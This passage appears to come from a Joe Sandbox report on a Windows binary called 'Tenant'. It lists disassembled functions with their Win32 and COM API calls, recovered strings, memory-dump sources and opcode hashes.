                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 830647256-0
                                                                                        • Opcode ID: e282c941d3dcd73d35b1c49333f6ff9b435a2e99a2f88006047bb4b70298f4b9
                                                                                        • Instruction ID: e37f7e0797e9fafe7fecfcf559f3cdd86b647e4f224d86eeb0b7fe2913fa3ae6
                                                                                        • Opcode Fuzzy Hash: e282c941d3dcd73d35b1c49333f6ff9b435a2e99a2f88006047bb4b70298f4b9
                                                                                        • Instruction Fuzzy Hash: 7461BE75940218AFDB10DFA4DC85EEE77F8EF49704F100199FA18A72A1CB74AD41DB64
                                                                                        Function 00AF77B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AF77DD
                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00AF7836
                                                                                        • VariantInit.OLEAUT32(?), ref: 00AF7848
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AF7868
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00AF78BB
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AF78CF
                                                                                        • VariantClear.OLEAUT32(?), ref: 00AF78E4
                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00AF78F1
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AF78FA
                                                                                        • VariantClear.OLEAUT32(?), ref: 00AF790C
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AF7917
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                        • String ID:
                                                                                        • API String ID: 2706829360-0
                                                                                        • Opcode ID: 13392543fe4b46982bc052c4eeff51a8b663bbdbdc0890eef66068fc7be6790b
                                                                                        • Instruction ID: 6da146bce52d63b0b8d32c6538781a8054ec6cb0695d4833ed1c28bf98d5b6a5
                                                                                        • Opcode Fuzzy Hash: 13392543fe4b46982bc052c4eeff51a8b663bbdbdc0890eef66068fc7be6790b
                                                                                        • Instruction Fuzzy Hash: 44415435A0411D9FCB04EFA4D8989EDBBB9FF48354F108069FA55A7361CB70AA45CF90
                                                                                        Function 00B00508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00B00530
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00B005B1
                                                                                        • GetKeyState.USER32(000000A0), ref: 00B005CC
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00B005E6
                                                                                        • GetKeyState.USER32(000000A1), ref: 00B005FB
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00B00613
                                                                                        • GetKeyState.USER32(00000011), ref: 00B00625
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00B0063D
                                                                                        • GetKeyState.USER32(00000012), ref: 00B0064F
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00B00667
                                                                                        • GetKeyState.USER32(0000005B), ref: 00B00679
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 9472ba164b5ded326bc79a72192bb0b625165dba4ed43bbfc3fdadba6adbc546
                                                                                        • Instruction ID: 48e62d062ea6802302109e8888fb9b80c0916e4dded15678b5423a2422a9745f
                                                                                        • Opcode Fuzzy Hash: 9472ba164b5ded326bc79a72192bb0b625165dba4ed43bbfc3fdadba6adbc546
                                                                                        • Instruction Fuzzy Hash: 3041D6305247CA6DFF30B66488543B9BEE1EF61304F0840DAD9C6475C1EBA599D8CFA2
                                                                                        Function 00B18AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • CoInitialize.OLE32 ref: 00B18AED
                                                                                        • CoUninitialize.OLE32 ref: 00B18AF8
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00B33BBC,?), ref: 00B18B58
                                                                                        • IIDFromString.OLE32(?,?), ref: 00B18BCB
                                                                                        • VariantInit.OLEAUT32(?), ref: 00B18C65
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B18CC6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                        • API String ID: 834269672-1287834457
                                                                                        • Opcode ID: b12979946bd8767a69b3ab19981cc023b01d3a0910c6c0d41f3474ff3a7d68cb
                                                                                        • Instruction ID: f5fe28a8b176f2e1b10551f51f8071c714d77c509a4e6536d7cdc52534658303
                                                                                        • Opcode Fuzzy Hash: b12979946bd8767a69b3ab19981cc023b01d3a0910c6c0d41f3474ff3a7d68cb
                                                                                        • Instruction Fuzzy Hash: 27616B702087119FD710DF24C985FAAB7E8FF49714F504889F9859B291DB70ED88CBA6
                                                                                        Function 00B0BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00B0BB13
                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B0BB89
                                                                                        • GetLastError.KERNEL32 ref: 00B0BB93
                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00B0BC00
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                        • API String ID: 4194297153-14809454
                                                                                        • Opcode ID: bd0cceb3aaa57581d71be9bac2a2f59dd4423713c56bba79901e81cb43a286c0
                                                                                        • Instruction ID: 3e57c22c87ff81b73673f796a8b0815b7e252952d11a3c7faeedef814cb957b1
                                                                                        • Opcode Fuzzy Hash: bd0cceb3aaa57581d71be9bac2a2f59dd4423713c56bba79901e81cb43a286c0
                                                                                        • Instruction Fuzzy Hash: 8231A135A00209AFCB10EF64C995EAEBBF8EF48300F1480E5E806972E6DB719D05CB51
                                                                                        Function 00AF9B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00AFB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB7BD
                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AF9BCC
                                                                                        • GetDlgCtrlID.USER32 ref: 00AF9BD7
                                                                                        • GetParent.USER32 ref: 00AF9BF3
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AF9BF6
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00AF9BFF
                                                                                        • GetParent.USER32(?), ref: 00AF9C1B
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AF9C1E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1536045017-1403004172
                                                                                        • Opcode ID: a0275a8108d4f7b2a2562d6f9745f65b0ea53d78d7e6573ce056ea6154f354b5
                                                                                        • Instruction ID: 0b523ed061c33d3bd2b6a59eb063a400b78fd62d15c4cc327b9a87ae10f15a0d
                                                                                        • Opcode Fuzzy Hash: a0275a8108d4f7b2a2562d6f9745f65b0ea53d78d7e6573ce056ea6154f354b5
                                                                                        • Instruction Fuzzy Hash: AA21D370900108BFCF04EBA0DC95EFEBBB9EF95310F100155FA61932E6EB7558159B20
                                                                                        Function 00AF9C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00AFB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB7BD
                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AF9CB5
                                                                                        • GetDlgCtrlID.USER32 ref: 00AF9CC0
                                                                                        • GetParent.USER32 ref: 00AF9CDC
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AF9CDF
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00AF9CE8
                                                                                        • GetParent.USER32(?), ref: 00AF9D04
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AF9D07
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1536045017-1403004172
                                                                                        • Opcode ID: 886822c765c6a57c2be95dce353d824e2722abbdb818e0489dd027002bf59cf7
                                                                                        • Instruction ID: c230e5f8110a6ca9301ba7360f433888c24eb6dd3a22fa23be85d0ce5ec0a0dc
                                                                                        • Opcode Fuzzy Hash: 886822c765c6a57c2be95dce353d824e2722abbdb818e0489dd027002bf59cf7
                                                                                        • Instruction Fuzzy Hash: 6B21F571901108BFDF10ABA0CC95FFEBBB9EF95300F200155F951931A6DB755915DB20
                                                                                        Function 00AF9D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 00AF9D27
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00AF9D3C
                                                                                        • _wcscmp.LIBCMT ref: 00AF9D4E
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AF9DC9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1704125052-3381328864
                                                                                        • Opcode ID: 09f56591d46e2790e2455236de93a9957e5d810a1a18738196d508e45c69ca0f
                                                                                        • Instruction ID: 96f2fe480e0e12065b1416eb0aa90a17adc093b6c931794d7ced30303e5ca0f3
                                                                                        • Opcode Fuzzy Hash: 09f56591d46e2790e2455236de93a9957e5d810a1a18738196d508e45c69ca0f
                                                                                        • Instruction Fuzzy Hash: 0B11E37724830ABAFA012760EC16FB777ACDF15361B304296FB00A50E1FE666A115951
                                                                                        Function 00B18F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00B18FC1
                                                                                        • CoInitialize.OLE32(00000000), ref: 00B18FEE
                                                                                        • CoUninitialize.OLE32 ref: 00B18FF8
                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00B190F8
                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B19225
                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B33BDC), ref: 00B19259
                                                                                        • CoGetObject.OLE32(?,00000000,00B33BDC,?), ref: 00B1927C
                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00B1928F
                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B1930F
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B1931F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 2395222682-0
                                                                                        • Opcode ID: d9b13530392f057d8bfd335a7660b2234e6a0774e1025ede40704fbeb7ff8f63
                                                                                        • Instruction ID: 7f0bd487b2c7006f1bad703c6384d2f1587bce348c7c580ca5d1f80e485c0832
                                                                                        • Opcode Fuzzy Hash: d9b13530392f057d8bfd335a7660b2234e6a0774e1025ede40704fbeb7ff8f63
                                                                                        • Instruction Fuzzy Hash: 28C16671208345AFC700EF64C89496BB7E9FF89708F50499CF98A9B251DB31ED85CB92
                                                                                        Function 00B019CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B019EF
                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01A03
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00B01A0A
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01A19
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B01A2B
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01A44
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01A56
                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01A9B
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01AB0
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01ABB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                        • String ID:
                                                                                        • API String ID: 2156557900-0
                                                                                        • Opcode ID: af84605448517b377566194098c147198f47e1786c02e9b88c92fbaf78d78292
                                                                                        • Instruction ID: 7f21342f266349c9b03c2befa603240abd39e6e3dc1f9467f54f147cb8dcb92a
                                                                                        • Opcode Fuzzy Hash: af84605448517b377566194098c147198f47e1786c02e9b88c92fbaf78d78292
                                                                                        • Instruction Fuzzy Hash: 5E31E171611208BFDB24EF58DC94BA93BEAEF65315F208A55F810C71D0CFB89D408B50
                                                                                        Function 00ADC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00AA260D
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00AA2617
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00AA262C
                                                                                        • GetStockObject.GDI32(00000005), ref: 00AA2634
                                                                                        • GetClientRect.USER32(?), ref: 00ADC0FC
                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00ADC113
                                                                                        • GetWindowDC.USER32(?), ref: 00ADC11F
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00ADC12E
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00ADC140
                                                                                        • GetSysColor.USER32(00000005), ref: 00ADC15E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3430376129-0
                                                                                        • Opcode ID: 6785e8d415843ad97e03ebe77c4cd9af3eda68f9b4e4cbd6d63ba3ae5f90ba25
                                                                                        • Instruction ID: ff1480f730f44570b5d4f28dea565e90914986d52d8797b8a535fb14b0410676
                                                                                        • Opcode Fuzzy Hash: 6785e8d415843ad97e03ebe77c4cd9af3eda68f9b4e4cbd6d63ba3ae5f90ba25
                                                                                        • Instruction Fuzzy Hash: 9B119731510206BFDB216FA4EC59BED7BB6EF19321F200265FA26A60E1CF310960EF10
                                                                                        Function 00AAAD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AAADE1
                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 00AAAE80
                                                                                        • UnregisterHotKey.USER32(?), ref: 00AAAFD7
                                                                                        • DestroyWindow.USER32(?), ref: 00AE2F64
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00AE2FC9
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AE2FF6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                        • String ID: close all
                                                                                        • API String ID: 469580280-3243417748
                                                                                        • Opcode ID: 907f0924692c2226136026a6d901e4cf1cf5d5cf8279ccbedccc2f2d25eb4ff5
                                                                                        • Instruction ID: 1888f94fa0f18b117acffdf06d76b8adda3f2d8fb9cec0123daf0ace929c91b4
                                                                                        • Opcode Fuzzy Hash: 907f0924692c2226136026a6d901e4cf1cf5d5cf8279ccbedccc2f2d25eb4ff5
                                                                                        • Instruction Fuzzy Hash: C0A15E71701212CFCB29EF55C999F69F7A4BF15700F1542ACE40AAB292CB31AD12CF91
                                                                                        Function 00AFAD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnumChildWindows.USER32(?,00AFB13A), ref: 00AFB078
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChildEnumWindows
                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                        • API String ID: 3555792229-1603158881
                                                                                        • Opcode ID: 175ea3289e0f1d07794d45389b542ece0f4fc77f5b4fe6431ec7cd49f6d75f6b
                                                                                        • Instruction ID: 91e2d27bfb7b17aabf3f767c6f9ab619310662e8bdb96f02654c7ad4f9cb269b
                                                                                        • Opcode Fuzzy Hash: 175ea3289e0f1d07794d45389b542ece0f4fc77f5b4fe6431ec7cd49f6d75f6b
                                                                                        • Instruction Fuzzy Hash: CE9181B1600109EACB18EFA0C581FFEFB75BF14310F548119FA5AA7251DF306A59CBA1
                                                                                        Function 00AA31F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00AA327E
                                                                                          • Part of subcall function 00AA218F: GetClientRect.USER32(?,?), ref: 00AA21B8
                                                                                          • Part of subcall function 00AA218F: GetWindowRect.USER32(?,?), ref: 00AA21F9
                                                                                          • Part of subcall function 00AA218F: ScreenToClient.USER32(?,?), ref: 00AA2221
                                                                                        • GetDC.USER32 ref: 00ADD073
                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ADD086
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00ADD094
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00ADD0A9
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00ADD0B1
                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ADD13C
                                                                                        Strings
